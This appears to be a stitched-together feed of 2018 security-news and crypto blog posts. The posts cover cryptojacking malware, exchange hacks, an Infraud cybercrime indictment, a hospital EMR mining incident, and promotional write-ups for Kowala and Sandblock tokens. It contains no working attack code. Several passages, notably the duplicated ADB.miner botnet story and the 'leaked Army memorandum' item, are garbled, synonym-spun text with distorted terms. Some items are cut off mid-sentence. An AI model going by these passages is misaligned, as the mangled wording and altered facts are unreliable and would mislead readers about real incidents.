Their idea was reasonable enough, but its implementation has come under scrutiny. The digital currencies endured several embarrassing events in 2017 that brought increased examination of their claims. Later in the year, Tether severed ties with their independent auditor, and, In December, Tether was served a records subpoena by the Commodity Futures Trading Commission.

Ways to Tether

However, there are other stable coins available that can more accurately and authentically stabilize the value of a cryptocurrency.

Kowala and its kUSD token are digitally connected to the price of the U.S. dollar. Using advanced computer metrics, Kowala can accurately correlate its value within seconds of a change in the value of the U.S. dollar. kUSD is not backed by a fiat currency, so it embraces the same digital laurels as other cryptocurrencies.

<iframe width=”560″ height=”315″ src=”https://www.youtube.com/embed/9XB67qwz48M” frameborder=”0″ allow=”autoplay; encrypted-media” allowfullscreen></iframe>

In this way, Kowala is providing a stable cryptocurrency that is more equipped to fulfill Nakamoto’s original vision for digital currency – to buy things. A kUSD holder could confidently make a purchase with the digital currency without concern that it would radically change in value. In our digital-first culture, this feels like a natural expression and use-case for digital currencies.

Fortunately, although they are relatively new, cryptocurrency markets are incredibly diverse. It’s good that Bitcoin attracts so much attention and money, and it’s even better that there is a broad market of alternative currencies that can fulfill other niche needs. Unfortunately, each of hundreds of alt-coins share one quality – they are incredibly volatile. Stable coins like Kowala stand apart and serve an important role in the complex crypto ecosystem. They make it usable and reliable. It’s a fundamental concept that’s as old as money itself.

The post Stability Means Usability for Cryptocurrencies appeared first on TechWorm.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

2018-02-10_ITT.pngFor starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


2018-02-10_ITTGroups

Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

2018-02-10_ITTNew

Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresA federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.

 

Italian cryptocurrency exchange BitGrail loses $170 million

One of the biggest problems with cryptocurrency exchanges is that they're a juicy, enticing target for high-tech criminals. Case in point, Italian exchange BitGrail, which lost $170 million worth of Nano tokens, a little-known digital coin previously called RaiBlocks. BitGrail is the second exchange that lost of massive amount of money this year -- and it's only February -- following Tokyo-based Coincheck, which lost between $400 and $534 million worth of coins in a cyberattack on its internet-connected wallet back in January.

Source: The Wall Street Journal

Russian Scientists Arrested for Using Nuclear Weapon Facility to Mine Bitcoins

Two days ago when infosec bods claimed to have uncovered what's believed to be the first case of a SCADA network (a water utility) infected with cryptocurrency-mining malware, a batch of journalists accused other authors of making fear-mongering headlines, taunting that the next headline could be about cryptocurrency-miner detected in a nuclear plant. It seems that now they have to run a

Webroot Threat Blog: Cyber News Rundown: Scarab Ransomware Strikes Back

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst and a guy with a passion for all things security. Any questions? Just ask.

New Variant of Scarab Ransomware

With a few interesting changes to the original Scarab ransomware, Scarabey is quickly targeting Russian-speaking users with brute force attacks on unsecured RDP connections, rather than with the spam email campaigns used by its predecessor. Additionally, Scarabey takes the ransom a bit further by deleting 24 files from the encrypted machine for every 24 hours that the ransom remains unpaid.

Botnets Used to Spread Cryptocurrency Miners

Following the Shadow Brokers release of NSA exploits last summer, the use of EternalBlue continues with the latest trend of using the exploit to compromise machines and turn them into cryptocurrency miners. By expanding the botnet to cover over 500,000 unique machines, the attackers have successfully brought in more than $3 million since May of 2017. The use of such a large-scale botnet can effectively mine for the more resource-intensive currencies with ease and even disrupt businesses from their normal workflow for days at a time.

Bitcoin Ads Circumvent Facebook Ban

In the past week, Facebook officially implemented a ban on all cryptocurrency-related advertisements on their site. However, the ads have continued to appear for many users with characters in the phrase ‘bitcoin’ simply misspelled. The ban was initially set to block misleading financial services and products that unknowing users might click on due to the apparent legitimacy of the ads.

 

Do you live in one of the most-hacked states?

Mac Software Sites Distributing Crypto Miners

As crypto miners continue to gain popularity among cyber criminals, it was inevitable that they would begin focusing on Macs. MacUpdate, a well-known software download site, was recently found to be bundling miners with commonly used applications. Luckily, some of these bundles are poorly written and often fail to launch the decoy app, which is intended to draw users’ attention away from the malicious activity. To make matters worse, several other download sites were also affected and waited far too long to remove the malicious download links from their servers.

Tech Scammers Exploit Chrome Flaw

Tech scammers have long been the bane of legitimate software companies and their support teams. The latest trick, however, can easily bring an unsuspecting user to a full panic attack by simply rendering a Chrome browser completely unusable. First it displays an error message and then silently forces the browser to save a random file to disk at such a pace that the machine’s CPU maxes out and leaves the computer in a ‘locked’ state in the hopes that the victim will actually contact the phony support number being displayed.

The post Cyber News Rundown: Scarab Ransomware Strikes Back appeared first on Webroot Threat Blog.



Webroot Threat Blog

New Deepfakes forum goes mining with Coinhive

You may or may be familiar with the furore over Deepfakes, a relatively new development in pornography involving a tool called FacesApp, which is capable of producing a real porn clip that replaces the original actors’ heads with those of celebrities—or indeed, anyone at all.

Online fakes have been around since the early 2000s or possibly even earlier; alongside those old photos, fakers would also make the odd terrible porno flick. Those movies would quite literally be a static cut out of a celebrity’s head stuck onto the body. Some 20 years later, the tech has caught up, and the web is suddenly dealing with the fallout.

FacesApp allows people to “train” an AI to create a realistic head so the scene is practically indistinguishable from reality. The AI is trained by feeding it images or footage of people; the more data it has to go off, the more realistic everything is.

After a media firestorm, the inevitable has happened. All of the Deepfake subreddits, where the majority of content was being created, have been taken offline after major players such as Twitter and PornHub had already effectively banned Deepfake content from their networks.

The Deepfake tech is available for pretty much anyone to make use of—the only real barrier to entry is having a powerful PC capable of withstanding the intensive training process, which can take hours or days to complete.

Now, if you were a crafty cybercriminal and knew that the main Deepfakes sources were taken offline, with a sizable community of content consumers and creators with heavy-duty PC rigs suddenly set adrift, what would you do?

The answer, of course, is monetize potentially dubious fakes that you didn’t create yourself and hammer visitor’s PCs with mining scripts.

One of the most popular “lifeboat” sites we’ve seen for those unceremoniously dumped from the tender embrace of reddit was being promoted pretty heavily on surviving subreddits:

promo messages

Click to enlarge

On the surface, it looks like a fairly typical forum, and it’s been getting a fair bit of activity so far. It all looks legit—or at least as legit as can be given the controversial content on offer:

Deep...coins?

Click to enlarge

A quick check of the source code, while your CPU likely ramps up to 100 percent, would tell a slightly different story:

miner code

Click to enlarge

We have some Javascript located at:

/mybbalertsjs(dot)min(dot)js

Click to enlarge

Sure, you could try to make sense of it as is. Or, you could just unpack it instead and save yourself a headache because that is a large, confusing pile of code. What is it doing?

miner function

var Miner=function

…miner…function? Did this site place mining scripts in the background?

coinhive

Click to enlarge

self.CoinHive.CONFIG=

They sure did, and we block both the mining and the website in question.

blocked

Click to enlarge

Coinhive is something we’ve been blocking since October. It allows you to place cryptocurrency mining scripts on your webpage, similar to how regular adverts are placed, except it’ll try to make as much use of your machine as possible to whip up some Monero coins for the site owner. Here’s an example of a site pushing a PC to the limit via mining scripts in the background. Check out the resources being gobbled up on the right-hand side:

Ramping up

Click to enlarge

In an age of people leaving dozens of tabs open and going for dinner, websites running scripts that ramp you up to 100 percent CPU usage and generate a fair bit of heat in the bargain just aren’t my thing. Now that we have DIY fake porn tech which demands high system specs and also has people simultaneously making content as well as downloading it, they’re prime targets for a spot of potentially surreptitious cryptomining taking place behind the scenes.

We’ve seen a few mentions of other Deepfake aficionados complaining about dodgy sites, and we’ll be taking a closer look to see what’s out there. All in all, you’re probably better off steering clear of the whole mess and taking up a less stress-inducing hobby (for you and your computer).

Keep your security tools up to date, make informed decisions about what you want to block, and keep those CPU temperatures down to a minimum!

The post New Deepfakes forum goes mining with Coinhive appeared first on Malwarebytes Labs.

Water Utility Infected by Cryptocurrency Mining Software

A water utility in Europe has been infected by cryptocurrency mining software. This is a relatively new attack: hackers compromise computers and force them to mine cryptocurrency for them. This is the first time I've seen it infect SCADA systems, though.

It seems that this mining software is benign, and doesn't affect the performance of the hacked computer. (A smart virus doesn't kill its host.) But that's not going to always be the case.

Earn Tradable Cryptocurrencies by Patronizing your Favourite Businesses

Customer relation is an essential part of every business. For the purposes of sustainability, businesses must strive towards having repeat customers, in other words customers who are loyal to their brands.

Limitations of suspended rewards

The typical business environment is littered with different forms of loyalty programs that are aimed at encouraging customers to return for more business. Other aspects of such programs are targeted towards receiving feedbacks from these customers for purposes of brand management and improvement. However, in today’s era where processes are ruled by increased dynamism, it is difficult to hold on to customers with mere promises of suspended value. Besides, following up on numerous loyalty programs from the various vendors than an individual patronizes can be exhaustive and confusing.

Most businesses today do not get the expected responses from their customers in terms of feedback. Unlike like several years ago when the world was generally slower, millennials these days hardly have the luxury of time to fill out forms especially over the internet. In most cases, the ones who make out time to give feedbacks are usually dissatisfied customers, hence not representing the true reflection of service or product delivery. By introducing blockchain and incentivized processes, the feedback mechanism will definitely function better. Beyond just a profitable exercise, customers will feel more respected and appreciated rather than just being used.

Beyond feedback delivery as a medium of loyalty, several companies already provide some extra incentives. The complication comes from how cumbersome it usually is claiming such incentives. Most times they come as suspended benefits other than real time immediate value.

A rallying point for every business

By creating a unifying platform, Sandblock is using blockchain technology to provide immediate value in terms of loyalty programs.

With the emerging trend where all the major brands in the world are now starting to look into the blockchain technology for their future developments, it is only a matter of time before each one of those brands will start using the blockchain to tighten the relationship with their customers. When this happens, you can only imagine the number of tokens an individual can hold with respect to the various businesses that they patronize.

Sandblock’s protocol is designed as a centre of gravity that can serve as a rallying point for an infinite number of tokens. On this platform, users can trade their tokens which they must have acquired from their various vendors, including loyalty tokens.

An effective utility token

All this will revolve around Sandblock’s ERC20 satisfaction (SAT) token. This will function as a consortium token in order to ensure the cohesiveness of the ecosystem which will be comprised of various sizes of businesses. Every other businesses can then create their own peculiar tokens off the SAT based on Sandblock’s protocol. This will enable all players to communicate, exchange and benefit from the collaboration efforts that they choose to engage in.

The existing loyalty systems have the tint of an arm twisting exercise, this is because to enjoy these benefits, customers in most cases must return to the same business. This sometimes feels like blackmail because failing to return automatically implies forfeiture of such benefits. By achieving rewards in tradable tokens, customers will retain control of their value since they can be easily exchanged within the ecosystem. However, it will also serve as a wake up call to businesses who will have to sit up, hence the introduction of healthy competition.

The post Earn Tradable Cryptocurrencies by Patronizing your Favourite Businesses appeared first on TechWorm.

Hospital warns 24,000 patients that its EMR system was hacked to mine cryptocurrency

Hackers are increasingly setting their sights on electronic medical records (EMR) to extort money from hospitals and their affiliated system vendors. Most recently, one hospital has seen its EMR service hijacked to mine cryptocurrency.

On January 26, Parsons, Tennessee-based Decatur County General Hospital started notifying customers that its EMR vendor was compromised by a hacker who injected cryptocurrency mining malware into its systems.

“On November 27, 2017, we received a security incident report from our EMR system vendor indicating that unauthorized software had been installed on the server the vendor supports on our behalf,” reads the DCGH notice. “The unauthorized software was installed to generate digital currency, more commonly known as ‘cryptocurrency.’”

An investigation revealed the attacker infected the servers remotely some time in September. However, the hospital was only notified of the breach two months later, which is highly unorthodox considering that the attackers could have (and potentially might have) compromised the sensitive information of tens of thousands of patients.

It is unclear how much cryptocurrency was generated for the attacker(s) as part of the hack, but DCGH says “the EMR vendor replaced the server and operating about four days later [following the breach].”

The hospital says information on the affected server included patient names, addresses, dates of birth, Social Security numbers, diagnosis and treatment data, and insurance billing information.

On the good side, while the investigation into the breach continues, DCGH claims (so far) it has no evidence that patient information was acquired or viewed by unauthorized parties.

“Based upon reports of similar incidents, we do not believe that your health information was targeted by any unauthorized individual installing the software on the server,” reads the reassuring notice.

The growing popularity of cryptocurrency has spawned huge interest in cryptocurrency miners and ransomware. Digital currency is highly untraceable, while at the same time it can be generated out of thin air by hacking and using other people’s computers to ‘mine’ new coins.

For the curious, the cryptocurrency mined with the hacked EMR vendor’s systems was reportedly Dash. According to the World Coin Index, which tracks the fluctuating values of all cryptocurrencies in existence, Dash is the fourth-most valuable cryptocurrency per unit, currently trading at 557 USD.

For comparison, one Ethereum is $820, BitcoinCash sells for just over $1,000, and the almighty Bitcoin – which two months ago stood at almost $20,000 per unit – is now worth $8,200.

Cryptomining Software Discovered on Tennessee Hospital’s EMR Server

A Tennessee hospital discovered cryptomining software installed on a server that hosts its electronic medical records (EMR) system. In January 2018, Decatur County General Hospital began notifying patients of a incident involving its electronic medical record systems. Its breach notification letter (PDF) reveals the hospital first learned about the security event from its EMR vendor: […]… Read More

The post Cryptomining Software Discovered on Tennessee Hospital’s EMR Server appeared first on The State of Security.

What can businesses learn from the cyber threat landscape of 2017?

Over the course of 2017, global cyber threats continued to evolve at pace, resulting in a dramatic reshaping of the cyber security landscape. Traditional threats such as generic Trojans, ransomware

The post What can businesses learn from the cyber threat landscape of 2017? appeared first on The Cyber Security Place.

Japanese Teenager Arrested For Creating Cryptocurrency Stealing Malware

17-year-old arrested in Japan for developing malware that steals cryptocurrency wallet passwords

A 17-year-old school boy has been arrested by the Japanese police on suspicion of creating a computer virus that steals private keys (passwords) to wallets of cryptocurrency users, specifically targeting MonaCoin wallets.

For those unaware, MonaCoin (MONA) is a decentralized, open-source cryptocurrency launched in Japan in the year 2014. It is also advertised as “the first Japanese cryptocurrency,” and is currently ranked 88th on CoinMarketCap based on market value. At present, one MonaCoin is equivalent to almost $4 and 434 Yen.

The teenager, a third-year high school student in Kaizuka, Osaka Prefecture, was arrested on Tuesday (January 30, 2018) by Aichi Prefectural Police, for allegedly creating illegal electromagnetic records and using them, reports local Japanese news website Mainichi. He hid the malware app created by him inside an application for viewing cryptocurrency market data in real. But, in reality, the malware app stole passwords for Monacoin wallets.

According to the arrest warrant, the teenager had shared the trojanized app on an online bulletin board frequented by MonaCoin users on October 10th 2017 under the guise of helping them monitor cryptocurrency market prices. On questioning by the police, the teen defended himself by stating that “I didn’t do it with malicious intent.”

After the teen shared the malicious app online, it was immediately downloaded and installed by a 31-year-old man from Tokyo. Shortly after the installation, this man discovered that 170 MonaCoins (around $500) had gone missing from his wallet. While there were series of posts on the bulletin board warning others to be careful about the suspicious “software”, it was too late for the man by then.

The teenager whose name has not been revealed yet is under investigation for using the passwords to steal funds from victims. The police are also investigating if the teen targeted other unsuspecting users and whether he stole more funds or not, as they believe that the number of victims is likely much higher. However, no charges have been filed yet.

Recently, Coincheck, a Japan-based cryptocurrency exchange, was hit by the biggest hack in the history of cryptocurrency in which 58 billion Yen ($534 million) worth of the virtual currency “NEM (Nemu)” was stolen from its digital wallets.

The post Japanese Teenager Arrested For Creating Cryptocurrency Stealing Malware appeared first on TechWorm.

Running Firefox, OnyX or Deeper on your Mac? You might be mining cryptocurrency for a hacker

Three widely used Mac apps infected with cryptocurrency miners have been flagged by security researchers this week. The programs, distributed through third-party aggregators (i.e. not the official Mac App Store), need to be immediately uninstalled if users are to stay out of harm’s way.

Earlier this week, researchers found fake or otherwise modified versions of Mozilla’s Firefox web browser, as well as system tools OnyX and Deeper, infected with cryptocurrency-mining malware targeting Macs. The modified apps were distributed through MacUpdate, a third-party Mac software aggregator.

Deeper is a personalization utility and OnyX is a popular maintenance tool. Both apps were created by veteran development studio Titanium Software.

Dubbed OSX.CreativeUpdate, the malware spread through hacked pages on MacUpdate. OSX.CreativeUpdate is a Trojan that, once installed, downloads its cryptocurrency mining component. The miner hijacks the Mac’s processor to generate digital “coins” that go straight to the attacker’s wallet.

A spokesperson for MacUpdate confirms the hack in a comment on all three infected download pages.

“If you have installed-and-run Firefox 58.0.2, OnyX, or Deeper since 1 February 2018, please accept my apologies, but you will need to follow these steps to remove a bitcoin miner which hacked versions of those apps,” writes the person, identified only as Jess. “This is not the fault of the respective developers, so please do not blame them. The fault is entirely mine for having been fooled by the hackers.”

In short, if you’ve downloaded any of these three apps through MacUpdate as of late, you need to trash them.

However, just deleting the app binaries is not enough. As power users should know, when new software is installed, MacOS makes room for additional application resources in different parts of the system – specifically, the Library folder. So, even if you delete the app itself, some leftovers might remain in this directory.

Case in point – according to Jess, users need to follow these exact steps to eliminate any potential infection with OSX.CreativeUpdate:

  • Delete any copies of the above titles you might have installed.
  • Download and install fresh copies of the titles.
  • In Finder, open a window for your home directory (Cmd-Shift-H).
  • If the Library folder is not displayed, hold down the Option/Alt key, click on the “Go” menu, and select “Library (Cmd-Shift-L)”.
  • Scroll down to find the “mdworker” folder (~/Library/mdworker/).
  • Delete the entire folder.
  • Scroll down to find the “LaunchAgents” folder (~/Library/LaunchAgents/).
  • From that folder, delete “MacOS.plist” and “MacOSupdate.plist” (~/Library/LaunchAgents/MacOS.plist and ~/Library/LaunchAgents/MacOSupdate.plist).
  • Empty the Trash.
  • Restart your system.

The web site says it already fixed the pages for Firefox, Onyx and Deeper. A lot of Mac owners make use of the vast software library that is MacUpdate. However, we advise downloading your third-party software either from the developer’s web site or through Apple’s curated Mac App Store. For more peace of mind, run Bitdefender Antivirus for Mac, which classifies cryptocurrency miners as malware and blocks them as such.

E Hacking News – Latest Hacker News and IT Security News: A New Botnet Targeting to Infect Android Devices with Malware that Mines the Monero Cryptocurrency

Another botnet showed up over the weekend on Saturday, February 3 focused entirely on Android gadgets precisely being port 5555, which on gadgets running the Android OS is the port utilized by the operating system's native Android Debug Bridge (ADB), a troubleshooting interface which awards access to a portion of the operating system's most sensitive features.

The reason why being so that by checking for open troubleshoot ports it can infect victims with malware that mines the Monero cryptocurrency.

As per security researchers from Qihoo 360's Network Security Research Lab (Netlab) division, the ones who discovered the botnet, named ADB.miner , just gadgets, for example, cell phones, smart TVs, and television top boxes, running the Android OS have been tainted as of not long ago.

"The number of scan [sources] has doubled every 12 [hours]," said Yiming Gong, Director of the Network Security Research Lab at Qihoo 360. "We will see how big this botnet gets."


The botnet gives off an impression of being aggressive and continues growing every day, with 
infected devices filtering the Web for other victims. As of now, the Botnet seems to have infected around 7,400 devices as detected by Netlab.


Recently scanning for this port 5555, shot to the #4 spot in Netlab's most scanned ports as opposed to the previous account, as it wasn't even in the top 10.


Most IP addresses to checking for different devices (which means they are now infected) are situated in China (~40%) and South Korea (~30%). Yiming informed further that the botnet has generally infected  "television related" devices, instead of smartphones.
  
Netlab says ADB.miner utilized some of Mirai's port scanning code also marks the first time an Android malware strain has obtained code from Mirai, a strain of Linux-based malware that was previously focused on just systems administration i.e. Networking and IoT devices.

All the same, the researchers still haven't given any insights with respect to the ADB vulnerability  the attackers are using to take control over devices however cleared up that they don't think the bug is particular to a specific seller (vendor). This in all probability implies that the bug influences the centre of the Android ADB segment itself.



E Hacking News - Latest Hacker News and IT Security News

A New Botnet Targeting to Infect Android Devices with Malware that Mines the Monero Cryptocurrency

Another botnet showed up over the weekend on Saturday, February 3 focused entirely on Android gadgets precisely being port 5555, which on gadgets running the Android OS is the port utilized by the operating system's native Android Debug Bridge (ADB), a troubleshooting interface which awards access to a portion of the operating system's most sensitive features.

The reason why being so that by checking for open troubleshoot ports it can infect victims with malware that mines the Monero cryptocurrency.

As per security researchers from Qihoo 360's Network Security Research Lab (Netlab) division, the ones who discovered the botnet, named ADB.miner , just gadgets, for example, cell phones, smart TVs, and television top boxes, running the Android OS have been tainted as of not long ago.

"The number of scan [sources] has doubled every 12 [hours]," said Yiming Gong, Director of the Network Security Research Lab at Qihoo 360. "We will see how big this botnet gets."


The botnet gives off an impression of being aggressive and continues growing every day, with 
infected devices filtering the Web for other victims. As of now, the Botnet seems to have infected around 7,400 devices as detected by Netlab.


Recently scanning for this port 5555, shot to the #4 spot in Netlab's most scanned ports as opposed to the previous account, as it wasn't even in the top 10.


Most IP addresses to checking for different devices (which means they are now infected) are situated in China (~40%) and South Korea (~30%). Yiming informed further that the botnet has generally infected  "television related" devices, instead of smartphones.
  
Netlab says ADB.miner utilized some of Mirai's port scanning code also marks the first time an Android malware strain has obtained code from Mirai, a strain of Linux-based malware that was previously focused on just systems administration i.e. Networking and IoT devices.

All the same, the researchers still haven't given any insights with respect to the ADB vulnerability  the attackers are using to take control over devices however cleared up that they don't think the bug is particular to a specific seller (vendor). This in all probability implies that the bug influences the centre of the Android ADB segment itself.

Cybersecurity week Round-Up (2018, Week 5)

Cybersecurity week Round-Up (2018, Week 5) -Let’s try to summarize the most important event occurred last week in 3 minutes.

The week began with massive cyber attacks against three Dutch banks and the National Tax Agency. Experts speculate the involvement of Russia because the attacks started after the revelation of the hack of the APT 28 group operated by the Dutch intelligence.

The wave of attacks against the cryptocurrency sector continues.
Security experts spotted two huge botnets and a malware specifically designed to mine cryptocurrency abusing victims’ resources.

The first mining botnet dubbed Smominru was discovered by researchers from Proofpoint. The malware uses the EternalBlue exploit to infect Windows computers and recruit them in Monero cryptocurrency mining activities.

The Smominru botnet has already infected more than half million systems.

It has been estimated that the botnet already mined 8,900 Monero ($2,346,271 at the current rate).

Researchers at Qihoo 360’s Netlab analyzed a new campaign powered by the DDG botnet, the second largest mining botnet of ever, that targets Redis and OrientDB servers. The miner has already infected nearly 4,400 servers and has mined over $925,000 worth of Monero since March 2017.

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.

APT groups are even more dangerous. Iran-linked APT OilRig target IIS Web Servers with new RGDoor Backdoor. The backdoor was used in attacks against Middle Eastern government organizations and financial and educational institutions.

South Korea warns of Flash Zero-Day flaw exploited by North Korea in surgical attacks.

In the second part of the week, security experts from Bitdefender detailed the malware Operation PZChao that was attributed to the Chinese Iron Tiger APT.

One of the most clamorous cases of the weak is the data leak that involved military personnel data caused by the improper use of the Fitness Strava Application.
The data leak exposed information related to military bases worldwide, some of them were not publicly disclosed before.

The Meltdown and Spectre saga is going on.

Over the weekend Microsoft rolled out out-of-band updates to disable mitigations for Spectre v2 attacks to problems reported by its customers after the installation of the security patches.

While experts claim Intel reportedly alerted Chinese companies before US Government about Meltdown and Spectre flaws, malware researchers have spotted proof-of-concept malicious code that exploits Spectre and Meltdown flaws.

Researchers at security firm Radware have spotted a new IoT botnet, dubbed JenX, the leverages the Grand Theft Auto videogame community to infect devices.

Crooks target ATMs with Ploutus-D malware, these are the first confirmed cases of Jackpotting in US.

Pierluigi Paganini

(Security Affairs – cybersecurity, cyberweek)

The post Cybersecurity week Round-Up (2018, Week 5) appeared first on Security Affairs.

Japan’s Financial Services Agency raided the Coincheck headquarters in Tokyo after the hack

 

Cryptocurrencies are in the middle of a Tempest, on Thursday India announced it would adopt measures to prevent the use of virtual currencies in the country, the value of Bitcoin dropped below $9,000 for the first time since November. Finance Minister Arun Jaitley, in his annual budget, explained its government would “take all measures to eliminate use of these crypto-assets in financing illegitimate activities or as part of the payment system”.

coincheck hack coindesk

A week after the security breach suffered by the virtual currency exchange Coincheck, Japanese authorities raided the company.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

After the MtGox case, the Japanese government passed a law on cryptocurrencies that assigns to the FSA the tack of regulating the exchanges operating in the country.

Coincheck had submitted an application to the FSA for a licence, the company was waiting for the permission.

This week, Coincheck announced it will refund about $400 million to 260,000 customers after the hack, the company will use its own funds.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia. The company announced it will refund about $400 million to customers after the hack. 

Japanese media criticized the company blaming the management to have underestimated the importance of security of its investor, they said Coincheck “expanded business by putting safety second”.

On Friday, agents of the Financial Services Agency raided the Coincheck’s headquarters in Tokyo’s Shibuya district with the intent to verify that the company adopted proper security measures to protect its assets.

“We have launched an on-site inspection to ensure preservation of clients’ assets,” said Finance Minister Taro Aso.

Japan’s Financial Services Agency gave Coincheck until February 13 to investigate the hack, implements additional security measures and “properly” deal with the affected clients.

According to Japanese bitcoin monitoring site Jpbitcoin.com, in November, yen-denominated bitcoin trades reached a record 4.51 million bitcoins, or nearly half of the world’s major exchanges of 9.29 million bitcoin.

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Japan’s Financial Services Agency raided the Coincheck headquarters in Tokyo after the hack appeared first on Security Affairs.

Leaked US Army Cyber Protection Brigade Memorandum appears to show Privacy Solutions compromised




The picture being referred to is a leaked picture of a memorandum on image board 4chan, complete with Department of Defence letterhead, seeming, by all accounts, to be from the United States Army’s Cyber Protection Brigade.

The posted picture displays an official document brought up on a terminal screen, on one side of which is a Common Access Card or CAC, complete with picture, conventional of a Department of Defence employee. It seems, by all accounts, to be a legitimate one, however it reeks of incredulity and skepticism. Be that as it may, it's as yet not clear with respect to why somebody would want this data leaked.

However another sensible theory can be that, there might be some sort of involvement of the cryptocommunity. Nevertheless an extraordinary method to constrain utilization of privacy solutions is to convey into the environment rumours about their being anything but, a sort of scheming way of spreading trepidation, uncertainty and doubt.

 “The success we have had with Tor, I2P, and VPN, cannot be replicated with those currencies that do not rely on nodes. There is a growing trend in the employment of Stealth addresses and ring signatures that will require additional R&D.” reads the document.

the memo's first line uncovers a unit required with the National Security Administration (NSA) and Cyber Protection Team (CPT) encouraging all the more financing for "new contracts and extra subsidizing to meet GWOT and drug interdiction targets aimed in July's Command update brief," Global War On Terror (GWOT) being a go-to pretext for about two decades of obtrusive military and law enforcement action.

“In order to put the CPT back on track, we need to identify and employ additional personnel who are familiar with the Crypto Note code available for use in anonymous currencies,” the memo stressed.
Crypto Note which is likewise the application layer for privacy tokens, for example, Bytecoin (BCN), Monero (XMR), utilizes a memory bound function which is hard to pipeline, that the pertinent agencies entrusted with monitoring and tracking internet solutions, and now coins, needs outside help with Crypto Note may say a lot about where the different government divisions are in terms of their security keenness.

The picture was distributed among Steemit, Veekly, and even Warosu exactly five months back, yet outlets, for example, Deep Dot Web may claim to have broken news. The document but is as yet worth dissecting, assuming its legitimacy.


As far as concerns its, Deep Dot Web claims to have contacted "a Monero developer, who spoke on state of obscurity," and the dev "said that the vast majority of the Monero engineers who have seen the leak trust it to be true. A few sources who were some time ago in the Armed force have additionally said they trust the report to be genuine." Offering ascend to the way that the contents of the document do give off an impression of being totally conceivable.

WannaMine: Cryptocurrency Mining Malware That Uses An NSA Exploit

WannaMine Malware That Uses NSA Exploit To Mine Cryptocurrencies Is On The Rise

The recent months have seen an increase in cyberattacks using cryptocurrency-mining tools, which has now become one of the main security threats.

